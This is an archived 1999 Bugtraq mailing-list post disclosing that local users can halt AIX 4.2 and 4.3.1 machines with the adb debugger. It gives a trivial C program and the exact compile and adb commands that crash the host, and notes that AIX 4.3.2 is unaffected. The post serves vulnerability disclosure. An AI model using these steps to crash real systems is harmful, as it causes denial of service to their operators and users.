[11000] in bugtraq

home help back first fref pref prev next nref lref last post

aix 4.2 4.3.1, adb

daemon@ATHENA.MIT.EDU (GZ Apple)
Mon Jul 12 20:57:54 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <15759.990712@21cn.com>
Date:         Mon, 12 Jul 1999 18:13:13 +0800
Reply-To: GZ Apple <gzapple@21cn.com>
From: GZ Apple <gzapple@21CN.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

Local users can halt the operating system by 'adb' command under my AIX
box.

Here's a simple C program:
main()
{
        int i;
        for ( i = 0; i < 10; i++ )
        {
        }

        return 0;
}

I compiled the program and run 'adb':
$ cc -g -o a.out a.c
$ adb a.out -
adb
.main,5:s
a.out: running

Now host halted. AIX 4.2(IBM RS/6000 F50) and AIX 4.3.1(IBM RS/6000 S70)
have 'adb' problem. But AIX 4.3.2 haven't the 'adb' problem. I have tested
it under my AIX box. Is it bug of AIX 4.2, 4.3.1?

GZ Apple                         mailto:gzapple@21cn.com

home help back first fref pref prev next nref lref last post